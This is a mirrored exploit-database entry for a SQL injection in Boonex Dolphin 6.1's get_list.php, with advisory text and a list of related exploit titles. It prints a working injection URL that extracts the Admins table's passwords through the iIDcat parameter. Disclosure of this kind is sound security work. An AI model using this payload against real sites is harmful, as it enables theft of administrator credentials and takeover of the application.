Boonex Dolphin 6.1 – ‘get_list.php’ SQL Injection

Exploit Database
123 阅读

作者： Yuri Goltsev

日期： 2011-10-19
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/36244/

source: https://www.securityfocus.com/bid/50286/info

Boonex Dolphin is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

Boonex Dolphin 6.1 is vulnerable; other versions may also be affected.

http://www.example.com/xml/get_list.php?dataType=ApplyChanges&iNumb=1&iIDcat=(select 1 from AdminMenu where 1=1 group by concat((select password from Admins),rand(0)|0) having min(0) )

last Exploits
Boonex Dolphin 6.1 – ‘get_list.php’ SQL Injection的更多信息

Joomla! Component com_leader – SQL Injection：
Freeway CMS 1.4.3.210 – SQL Injection：
PHP-Nuke 8.1.0.3.5b (Your_Account Module) – Blind SQL Injection (Benchmark Mode)：
BMForum Myna 6.0 – SQL Injection：
freepost 0.1 r1 – Multiple Vulnerabilities：
Umbraco CMS 7.12.4 – Remote Code Execution (Authenticated)：
Simple Chatbot Application 1.0 – Remote Code Execution (RCE)：
NUUO NVRmini 2 3.0.8 – Local File Disclosure：